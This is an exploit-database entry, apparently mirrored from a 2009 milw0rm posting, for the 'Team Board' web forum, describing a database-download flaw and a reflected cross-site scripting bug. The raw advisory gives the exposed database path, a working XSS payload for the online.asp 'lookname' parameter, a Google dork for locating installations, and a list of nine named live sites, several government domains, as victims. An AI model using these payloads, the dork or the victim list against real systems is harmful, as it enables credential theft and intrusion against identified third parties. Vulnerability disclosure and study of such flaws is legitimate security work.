Team Board

vendor:

Team Board

by:

Pouya_Server

7.5

CVSS

HIGH

DD/XSS

79, 79

CWE

Product Name: Team Board

Affected Version From: all version

Affected Version To: all version

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The vulnerability exists due to the application fails to properly sanitize user-supplied input. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary HTML and script code in a user's browser session in context of an affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically generate web pages. Additionally, the application should use a secure flag when setting cookies.

Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Team Board
Version : all version
Google Dork : team5 studio all rights reserved site:cn
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/data/team.mdb
 
[XSS]:
http://site.com/[Path]/online.asp?lookname=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
---------------------------------
Victem :
http://cinv.vhost021.cn/team
http://sxx.gov.cn/bbs
http://gdemc.gov.cn/bbs
http://bslogistics.cn/bbs
http://qzjd.gov.cn/teams
http://szlhlib.com.cn/cgbbs
http://sh9383.com.cn/digibook
http://www.gsjnrk.gov.cn/team
http://www.sxlcfda.gov.cn/yjlt
---------------------------------------------------------
#########################################################

# milw0rm.com [2009-02-04]